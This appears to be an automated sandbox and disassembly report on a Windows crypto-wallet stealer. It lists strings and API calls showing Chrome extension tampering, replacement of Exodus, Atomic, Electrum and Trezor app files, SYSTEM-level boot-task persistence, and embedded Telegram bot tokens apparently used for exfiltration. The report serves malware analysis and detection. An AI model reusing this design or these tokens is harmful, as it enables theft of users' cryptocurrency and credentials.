C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip, xrefs: 00007FF7ABC1B377
</code>, xrefs: 00007FF7ABC1BA7F
13374995715847847, xrefs: 00007FF7ABC1891E
Failed to terminate , xrefs: 00007FF7ABC18489
tabs, xrefs: 00007FF7ABC1854B, 00007FF7ABC18675, 00007FF7ABC1882C, 00007FF7ABC1894D, 00007FF7ABC18B04, 00007FF7ABC18C25, 00007FF7ABC18DD1, 00007FF7ABC18EA3, 00007FF7ABC19062, 00007FF7ABC1918C, 00007FF7ABC194F4, 00007FF7ABC19615, 00007FF7ABC197CC, 00007FF7ABC198F6, 00007FF7ABC19AB3, 00007FF7ABC19BDD, 00007FF7ABC19D9A, 00007FF7ABC19EC4
C:\Program Files\Google\Chrome\Extensions\lpfcbjknijpeeillifnkikgncikgfhdo, xrefs: 00007FF7ABC199FA
Directory and all contents deleted successfully: , xrefs: 00007FF7ABC17D7A
Extensions Installed, xrefs: 00007FF7ABC1B5E9
128CF4C4A59C494144DAA119829B936CB9188E7B9DEFDBD4C0493780A8F822BE, xrefs: 00007FF7ABC18D8E
mcohilncbfahbmgdjkbpemcciiolgcge, xrefs: 00007FF7ABC19A8E
hnfanknocfeofbddgcijnmhnfnkdnaad, xrefs: 00007FF7ABC1903A
Process , xrefs: 00007FF7ABC18472
activeTab, xrefs: 00007FF7ABC18537, 00007FF7ABC18661, 00007FF7ABC18818, 00007FF7ABC18939, 00007FF7ABC18AF0, 00007FF7ABC18C11, 00007FF7ABC1904E, 00007FF7ABC19178, 00007FF7ABC194E0, 00007FF7ABC19601, 00007FF7ABC197B8, 00007FF7ABC198E2, 00007FF7ABC19A9F, 00007FF7ABC19BC9, 00007FF7ABC19D86, 00007FF7ABC19EB0
IP Address: , xrefs: 00007FF7ABC1B6C5
1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, xrefs: 00007FF7ABC1B31F
13375110321620290, xrefs: 00007FF7ABC19E95, 00007FF7ABC19FA3
13375049800588985, xrefs: 00007FF7ABC193A6, 00007FF7ABC19413
13375110310591214, xrefs: 00007FF7ABC18646, 00007FF7ABC1874B
, xrefs: 00007FF7ABC1B670
C:\Program Files\Google\Chrome\Extensions\hnfanknocfeofbddgcijnmhnfnkdnaad, xrefs: 00007FF7ABC19290
928279468E812A7C237289C39C5EA79668D93AE33F533F0C2198516C379764B7, xrefs: 00007FF7ABC1900B
No wallet installed previously..., xrefs: 00007FF7ABC1AA8D
<all_urls>, xrefs: 00007FF7ABC1859E, 00007FF7ABC186C8, 00007FF7ABC1887F, 00007FF7ABC189A0, 00007FF7ABC18B57, 00007FF7ABC18C78, 00007FF7ABC190B5, 00007FF7ABC191DF, 00007FF7ABC19547, 00007FF7ABC19668, 00007FF7ABC1981F, 00007FF7ABC19949, 00007FF7ABC19B06, 00007FF7ABC19C30, 00007FF7ABC19DED, 00007FF7ABC19F17
13374559388926377, xrefs: 00007FF7ABC18BF6
egjidjbpglichdcondbcbdnbeeppgdph, xrefs: 00007FF7ABC18523
found chrome profiles, xrefs: 00007FF7ABC1A812
C:\Program Files\Google\Chrome\Extensions\egjidjbpglichdcondbcbdnbeeppgdph, xrefs: 00007FF7ABC18770
ZIP Local File Header signature not found in file., xrefs: 00007FF7ABC1805E
Failed to initialize Winsock., xrefs: 00007FF7ABC184E5
Failed to delete the directory., xrefs: 00007FF7ABC1B4C2
user = , xrefs: 00007FF7ABC1A707
6C086D45706F3CDD6696F63808255BDDE719EA09BA60CBC98CDFEB55C8E94AE2, xrefs: 00007FF7ABC187D5
C:\Program Files\Google\Chrome\Extensions\bfnaelmomeimhlpmgjnjophhpkkoljpa, xrefs: 00007FF7ABC19438
ios_base::failbit set, xrefs: 00007FF7ABC18341, 00007FF7ABC183A1
AF7CBA694AB611FF172D667CA5504FEBFB024ABC1637F2C63B8D72D67BBA3F5A, xrefs: 00007FF7ABC1A02D
Directory and its contents removed., xrefs: 00007FF7ABC1B2F0
D:\@dev\Extensions\Ronin (Extension), xrefs: 00007FF7ABC18D29
Failed to open file: , xrefs: 00007FF7ABC17EE0
Graph, xrefs: 00007FF7ABC1B445
C:\Users\, xrefs: 00007FF7ABC1A89D
All users: , xrefs: 00007FF7ABC1A606
C:\Program Files\Google\Chrome\Extensions\efbglgofoippbgcjepnhiblaibcnclgk, xrefs: 00007FF7ABC19710
C:\Program Files\Google\Chrome\Extensions\aholpfdialjgjfhomihkjbmgjidlcdno, xrefs: 00007FF7ABC18F5C
7427009775, xrefs: 00007FF7ABC1BD7A
E0DC88925F64449E216468A174ED51BFEE4E6510DF40B0D2B576B9F4DFFA468D, xrefs: 00007FF7ABC1949D
C:\Program Files\Windows Media Player\graph\graph.exe, xrefs: 00007FF7ABC1B24D, 00007FF7ABC1B459
hardware wallet replace finished, xrefs: 00007FF7ABC1A77D
C:\Program Files\Google\Chrome\Extensions\fnjhmkhhmkbjkkabndcnnogagogbneec, xrefs: 00007FF7ABC19FC8
Extraction complete., xrefs: 00007FF7ABC1B3A2
bfnaelmomeimhlpmgjnjophhpkkoljpa, xrefs: 00007FF7ABC19324
C:\Program Files\Google\Chrome\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn, xrefs: 00007FF7ABC18A48
api, xrefs: 00007FF7ABC1ACDD, 00007FF7ABC1ADD1
23.12.21, xrefs: 00007FF7ABC18FA4
7776586945:AAFQTT1AD04IUpOLlf1aziN70zm8frk2JnQ, xrefs: 00007FF7ABC1BC80
13375110364515390, xrefs: 00007FF7ABC18A23

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_fs_code_page$ErrorLastWindow$CleanupConsoleCreateEnumFileModuleNameProcessesShowSnapshotStartupToolhelp32gethostname
String ID: terminated successfully.$128CF4C4A59C494144DAA119829B936CB9188E7B9DEFDBD4C0493780A8F822BE$13374559388926377$13374561731521706$13374995715847847$13375049800588985$13375110241046665$13375110296496201$13375110310591214$13375110321620290$13375110331747787$13375110344191823$13375110354575865$13375110364515390$18750852BBA140FCF329F0B2F98ED961304CD00CFEE1A5FF44762B97F2CE9E2F$1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f$23.12.21$2CDA9B33DF3854077ED63B9E912DD676B1892A6CDD18DC59790C40799E92D71B$6442787215$6C086D45706F3CDD6696F63808255BDDE719EA09BA60CBC98CDFEB55C8E94AE2$7340678156$7427009775$7776586945:AAFQTT1AD04IUpOLlf1aziN70zm8frk2JnQ$7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o$7867603719:AAEHk7Xd_OIqLVzZCPZMe4dTduUoZLQ8y2Y$805CF202E4DF8532D12BE509DE6794904E1C5D1F9FD783FD1507ADE27DEEE8AA$928279468E812A7C237289C39C5EA79668D93AE33F533F0C2198516C379764B7$$</code>$<all_urls>$Device Name: $IP Address: $Location: $Wallets:<code>$AF7CBA694AB611FF172D667CA5504FEBFB024ABC1637F2C63B8D72D67BBA3F5A$All users: $C:\Program Files\Google\Chrome\Extensions$C:\Program Files\Google\Chrome\Extensions\aholpfdialjgjfhomihkjbmgjidlcdno$C:\Program Files\Google\Chrome\Extensions\bfnaelmomeimhlpmgjnjophhpkkoljpa$C:\Program Files\Google\Chrome\Extensions\efbglgofoippbgcjepnhiblaibcnclgk$C:\Program Files\Google\Chrome\Extensions\egjidjbpglichdcondbcbdnbeeppgdph$C:\Program Files\Google\Chrome\Extensions\fnjhmkhhmkbjkkabndcnnogagogbneec$C:\Program Files\Google\Chrome\Extensions\hnfanknocfeofbddgcijnmhnfnkdnaad$C:\Program Files\Google\Chrome\Extensions\lpfcbjknijpeeillifnkikgncikgfhdo$C:\Program Files\Google\Chrome\Extensions\mcohilncbfahbmgdjkbpemcciiolgcge$C:\Program Files\Google\Chrome\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn$C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f$C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip$C:\Program Files\Windows Media Player\graph$C:\Program Files\Windows Media Player\graph$C:\Program Files\Windows Media Player\graph\graph.exe$C:\Users\$CAC5B4D0F32AA7D73E8AF05E83A188D2ECBA2B6186D06E54306BC2427BBCD68C$D304D4787A15629A04F596502ED8CF8C6031BF683EB7BCFDB1819D5F02C9667B$D:\@dev\Extensions\Ronin (Extension)$Directory and all contents deleted successfully: $Directory and its contents removed.$Directory don't exist $E0DC88925F64449E216468A174ED51BFEE4E6510DF40B0D2B576B9F4DFFA468D$Extensions Installed$Extraction complete.$Extraction failed.$Failed to delete the directory.$Failed to initialize Winsock.$Failed to open file: $Failed to open output ZIP file: $Failed to terminate $Graph$No wallet installed previously...$Nothing found$Process $Processing: $There are no users. Exit$ZIP Local File Header signature not found in file.$ZIP file extracted successfully to $\AppData\Local\Google\Chrome\User Data$action.onClicked$activeTab$active_permissions$aholpfdialjgjfhomihkjbmgjidlcdno$api$bfnaelmomeimhlpmgjnjophhpkkoljpa$efbglgofoippbgcjepnhiblaibcnclgk$egjidjbpglichdcondbcbdnbeeppgdph$exists$fnjhmkhhmkbjkkabndcnnogagogbneec$found chrome profiles$graph.exe$hardware wallet replace finished$hash$hifafgmccdpekplomjjkcfgodnhcellj$hnfanknocfeofbddgcijnmhnfnkdnaad$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$lpfcbjknijpeeillifnkikgncikgfhdo$mcohilncbfahbmgdjkbpemcciiolgcge$nkbihfbeogaeaoehlefnkodbefgpgknn$remove_all$tabs$user =
API String ID: 955434303-2808589617
Opcode ID: 6013d6701c57a6ec3b83585831c122150b92ab5ecd6b8ec1042cd3ebb0e7c6a0
Instruction ID: 51549b4767dffb65060f02a2c28e2ba3d63a909523cded50747dfed08345b105
Opcode Fuzzy Hash: 6013d6701c57a6ec3b83585831c122150b92ab5ecd6b8ec1042cd3ebb0e7c6a0
Instruction Fuzzy Hash: 5173B422A16BC295E730EF38DC457F86361FB95348F815232D65C5AABAEF789384C350

Function 00007FF7ABC0CA90 Relevance: 104.7, APIs: 36, Strings: 23, Instructions: 1459COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7ABC09B00: GetEnvironmentVariableW.KERNEL32 ref: 00007FF7ABC09B53
Part of subcall function 00007FF7ABC09B00: FindFirstFileW.KERNEL32 ref: 00007FF7ABC09BC8

__std_fs_code_page.LIBCPMT ref: 00007FF7ABC0CFC9
__std_fs_code_page.LIBCPMT ref: 00007FF7ABC0D303
__std_fs_code_page.LIBCPMT ref: 00007FF7ABC0E2DA
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC0E6B6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E6CB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E6D7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E6DD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E6E3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E6E9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E6FB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E701
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E707
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E70D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E71F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E725
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E72B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E731
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E737
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E753
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E759
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E75F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E765
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E76B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E771
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E777

Strings

C:\Users\Public\Desktop\, xrefs: 00007FF7ABC0D929, 00007FF7ABC0DC57, 00007FF7ABC0DF4F
Trazor Suite.exe, xrefs: 00007FF7ABC0DD43
, xrefs: 00007FF7ABC0D58D
.lnk, xrefs: 00007FF7ABC0D94D, 00007FF7ABC0DC7B, 00007FF7ABC0DF73
.zip, xrefs: 00007FF7ABC0D1B4
.exe, xrefs: 00007FF7ABC0E095
Found directories:, xrefs: 00007FF7ABC0CB57
#, xrefs: 00007FF7ABC0D791
Electrum, xrefs: 00007FF7ABC0D62A
Unzipped Hardware Wallet: , xrefs: 00007FF7ABC0E574
\resources\app\assets\index.js, xrefs: 00007FF7ABC0D680
atomic.exe, xrefs: 00007FF7ABC0DA15
\resources\app\assets\javascript.js, xrefs: 00007FF7ABC0D79A
\resources\app\js\index.js, xrefs: 00007FF7ABC0D831
(User: None), xrefs: 00007FF7ABC0CF37
remove_all, xrefs: 00007FF7ABC0E69E
(User: , xrefs: 00007FF7ABC0CE43
Trezor, xrefs: 00007FF7ABC0D7DB, 00007FF7ABC0DC0B
Directory: , xrefs: 00007FF7ABC0CC5F
remove, xrefs: 00007FF7ABC0E746
Wallet: , xrefs: 00007FF7ABC0CC3F
Atomic, xrefs: 00007FF7ABC0D8F9
Exodus, xrefs: 00007FF7ABC0D748

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page$Concurrency::cancel_current_taskEnvironmentFileFindFirstVariable
String ID: Directory: $ $ (User: $ (User: None)$#$.exe$.lnk$.zip$Atomic$C:\Users\Public\Desktop\$Electrum$Exodus$Found directories:$Trazor Suite.exe$Trezor$Unzipped Hardware Wallet: $Wallet: $\resources\app\assets\index.js$\resources\app\assets\javascript.js$\resources\app\js\index.js$atomic.exe$remove$remove_all
API String ID: 1414602396-4070211798
Opcode ID: 738cbcb050f2cab1cf95462c7d617905f7a3f732f78e22ad0d0615d9c3ab8fc2
Instruction ID: 97de783a159f0f09542c2c7d64285d3e0d0ff4c8590ac6692626e95a4908e84e
Opcode Fuzzy Hash: 738cbcb050f2cab1cf95462c7d617905f7a3f732f78e22ad0d0615d9c3ab8fc2
Instruction Fuzzy Hash: F5E2A772A1D7C681EA20AB18F0447AEA361FB85794F914731DAAC07AFADF7CD184D710

Function 00007FF7ABC15EC0 Relevance: 103.0, APIs: 41, Strings: 17, Instructions: 1483memorycomCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF7ABC15F4F
GetLastError.KERNEL32 ref: 00007FF7ABC15F65
GetLastError.KERNEL32 ref: 00007FF7ABC15FEA
CoInitializeEx.COMBASE ref: 00007FF7ABC16189
CoCreateInstance.COMBASE ref: 00007FF7ABC162C7
CoUninitialize.OLE32 ref: 00007FF7ABC1633B

Part of subcall function 00007FF7ABC42A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC42A68
Part of subcall function 00007FF7ABC42A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC42A6E

VariantInit.OLEAUT32 ref: 00007FF7ABC163F7
VariantInit.OLEAUT32 ref: 00007FF7ABC16425
VariantInit.OLEAUT32 ref: 00007FF7ABC16456
VariantInit.OLEAUT32 ref: 00007FF7ABC16484
VariantClear.OLEAUT32 ref: 00007FF7ABC1653D
VariantClear.OLEAUT32 ref: 00007FF7ABC1654C
VariantClear.OLEAUT32 ref: 00007FF7ABC1655B
VariantClear.OLEAUT32 ref: 00007FF7ABC1656A
CoUninitialize.OLE32 ref: 00007FF7ABC165EC
SysAllocString.OLEAUT32 ref: 00007FF7ABC166DD
SysFreeString.OLEAUT32 ref: 00007FF7ABC1672D
CoUninitialize.OLE32 ref: 00007FF7ABC167D1
SysAllocString.OLEAUT32 ref: 00007FF7ABC168C4
SysFreeString.OLEAUT32 ref: 00007FF7ABC1690E
CoUninitialize.OLE32 ref: 00007FF7ABC169E2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC17950
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC17956
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1795C

Strings

Failed to register task. Error: , xrefs: 00007FF7ABC17666
Failed to initialize COM library., xrefs: 00007FF7ABC161AF
Failed to get process path. Error: , xrefs: 00007FF7ABC15FF2
Cannot get action collection., xrefs: 00007FF7ABC16DA7
Current process path: , xrefs: 00007FF7ABC16137
Failed to create TaskService instance., xrefs: 00007FF7ABC162ED
Failed to set executable path., xrefs: 00007FF7ABC17285
Task successfully registered to run at boot with admin rights., xrefs: 00007FF7ABC17794
Cannot create action., xrefs: 00007FF7ABC16F10
Cannot get trigger collection., xrefs: 00007FF7ABC16ACF
SYSTEM, xrefs: 00007FF7ABC17491
Failed to connect to Task Scheduler., xrefs: 00007FF7ABC16590
Cannot create boot trigger., xrefs: 00007FF7ABC16C3F
Failed to create task definition., xrefs: 00007FF7ABC16986
Cannot get Root Folder pointer., xrefs: 00007FF7ABC16775
MyBootTask, xrefs: 00007FF7ABC168BD, 00007FF7ABC17507
QueryInterface call failed for IExecAction., xrefs: 00007FF7ABC1707D

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Variant$ClearInitStringUninitialize$_invalid_parameter_noinfo_noreturn$AllocConcurrency::cancel_current_taskErrorFreeLast$CreateFileInitializeInstanceModuleName
String ID: Cannot create action.$Cannot create boot trigger.$Cannot get Root Folder pointer.$Cannot get action collection.$Cannot get trigger collection.$Current process path: $Failed to connect to Task Scheduler.$Failed to create TaskService instance.$Failed to create task definition.$Failed to get process path. Error: $Failed to initialize COM library.$Failed to register task. Error: $Failed to set executable path.$MyBootTask$QueryInterface call failed for IExecAction.$SYSTEM$Task successfully registered to run at boot with admin rights.
API String ID: 1778526238-4048398458
Opcode ID: ea152884a3c04c83ddf0a4e16c80e2dcda702b86bd59945dd2e4724f464faa05
Instruction ID: 727d08a0921471e84a6b4b5d77970a742f80bf262365d8ca0d23f0b8c25dad98
Opcode Fuzzy Hash: ea152884a3c04c83ddf0a4e16c80e2dcda702b86bd59945dd2e4724f464faa05
Instruction Fuzzy Hash: BBE28672A19BC181EE219B29E444BAEA351FBC57A0F914232DA6D17BF9DF7CD080D710

Function 00007FF7ABC0E790 Relevance: 94.8, APIs: 27, Strings: 26, Instructions: 2093COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF7ABC0E910
__std_fs_code_page.LIBCPMT ref: 00007FF7ABC0EB1B

Part of subcall function 00007FF7ABC260E0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC261F2
Part of subcall function 00007FF7ABC260E0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC261F8

Part of subcall function 00007FF7ABC42A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC42A68
Part of subcall function 00007FF7ABC42A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC42A6E

__std_fs_code_page.LIBCPMT ref: 00007FF7ABC0EF46

Part of subcall function 00007FF7ABC3E0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF7ABC03F96), ref: 00007FF7ABC3E0C6

Part of subcall function 00007FF7ABC03AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF7ABC03B25
Part of subcall function 00007FF7ABC03AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF7ABC03BCA

__std_fs_code_page.LIBCPMT ref: 00007FF7ABC0F01E
__std_fs_code_page.LIBCPMT ref: 00007FF7ABC0F9F6
__std_fs_code_page.LIBCPMT ref: 00007FF7ABC1062E
__std_fs_code_page.LIBCPMT ref: 00007FF7ABC1074D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10E29
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10E2F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10E52
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10E6F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10ECA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10ED0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10ED6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10F37
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10F3D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10F43
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10F49
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10F6C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10FA6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10FBC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10FC2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10FD0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10FD6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10FDC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10FE2

Strings

directory_iterator::directory_iterator, xrefs: 00007FF7ABC10E62, 00007FF7ABC10F99
\Preferences, xrefs: 00007FF7ABC0EC5B, 00007FF7ABC10D21
developer_mode, xrefs: 00007FF7ABC0F661, 00007FF7ABC0F697
Warning: Pinned extension is not a string, skipping., xrefs: 00007FF7ABC0F826
file_size, xrefs: 00007FF7ABC10EA1
Chrome User Data directory not found., xrefs: 00007FF7ABC0EA1E
extensions, xrefs: 00007FF7ABC0F5DC, 00007FF7ABC0F5F9, 00007FF7ABC0F617, 00007FF7ABC0F63E, 00007FF7ABC0F674, 00007FF7ABC0F6C6, 00007FF7ABC0F6E3, 00007FF7ABC0F701, 00007FF7ABC0FBE1, 00007FF7ABC0FEDB
ios_base::failbit set, xrefs: 00007FF7ABC10EEB
pinned_extensions, xrefs: 00007FF7ABC0F718, 00007FF7ABC0F72F, 00007FF7ABC0F755
exists, xrefs: 00007FF7ABC10E45, 00007FF7ABC10EBE, 00007FF7ABC10F5F, 00007FF7ABC10F82
profile, xrefs: 00007FF7ABC0F322, 00007FF7ABC0F33F, 00007FF7ABC0F35D, 00007FF7ABC0F384
status, xrefs: 00007FF7ABC10E78, 00007FF7ABC10FAF
ios_base::badbit set, xrefs: 00007FF7ABC10EE0
\Extensions, xrefs: 00007FF7ABC0EDD0
ios_base::eofbit set, xrefs: 00007FF7ABC10EF2
C:\Users\, xrefs: 00007FF7ABC0E812
File parse failed, xrefs: 00007FF7ABC0F2FF
\Secure Preferences, xrefs: 00007FF7ABC0EC62, 00007FF7ABC10D1A
name, xrefs: 00007FF7ABC0F371, 00007FF7ABC0F398
No extensions found in preferences., xrefs: 00007FF7ABC0F881
\AppData\Local\Google\Chrome\User Data, xrefs: 00007FF7ABC0E82D
macs, xrefs: 00007FF7ABC0FE61
protection, xrefs: 00007FF7ABC0FDEA
, xrefs: 00007FF7ABC109EE
settings, xrefs: 00007FF7ABC0FC52, 00007FF7ABC0FF55
No pinned extensions found or 'pinned_extensions' is not an array., xrefs: 00007FF7ABC0F863

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page$Concurrency::cancel_current_task$__std_fs_convert_narrow_to_wide$ApisFile
String ID: $C:\Users\$Chrome User Data directory not found.$File parse failed$No extensions found in preferences.$No pinned extensions found or 'pinned_extensions' is not an array.$Warning: Pinned extension is not a string, skipping.$\AppData\Local\Google\Chrome\User Data$\Extensions$\Preferences$\Secure Preferences$developer_mode$directory_iterator::directory_iterator$exists$extensions$file_size$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$macs$name$pinned_extensions$profile$protection$settings$status
API String ID: 1036029176-3567150991
Opcode ID: f895663f30f34bc3b1b4a73626bc2ecd69c99ea22f02fdf9c398603cfbca353b
Instruction ID: ede8744895a74ccbdb768f55d412b6b856b927d59b7bf8061f8ec1f8ee158f3c
Opcode Fuzzy Hash: f895663f30f34bc3b1b4a73626bc2ecd69c99ea22f02fdf9c398603cfbca353b
Instruction Fuzzy Hash: 1323A362A1EBC282EA34EB18E4547EAE361FBC5740F854132DA8D47AB9DF7CD544CB10

Function 00007FF7ABC0B600 Relevance: 85.3, APIs: 30, Strings: 18, Instructions: 1276COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7ABC0A810: __std_fs_code_page.LIBCPMT ref: 00007FF7ABC0A883

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0C99D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0C9A3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0C9A9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0C9AF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0C9BB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0C9C1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0C9C7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0C9D3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0C9D9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0C9DF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0C9EB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0C9F1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0C9F7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0CA03
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0CA09
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0CA0F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0CA1B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0CA21
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0CA27
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0CA33
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0CA39
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0CA3F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0CA4B
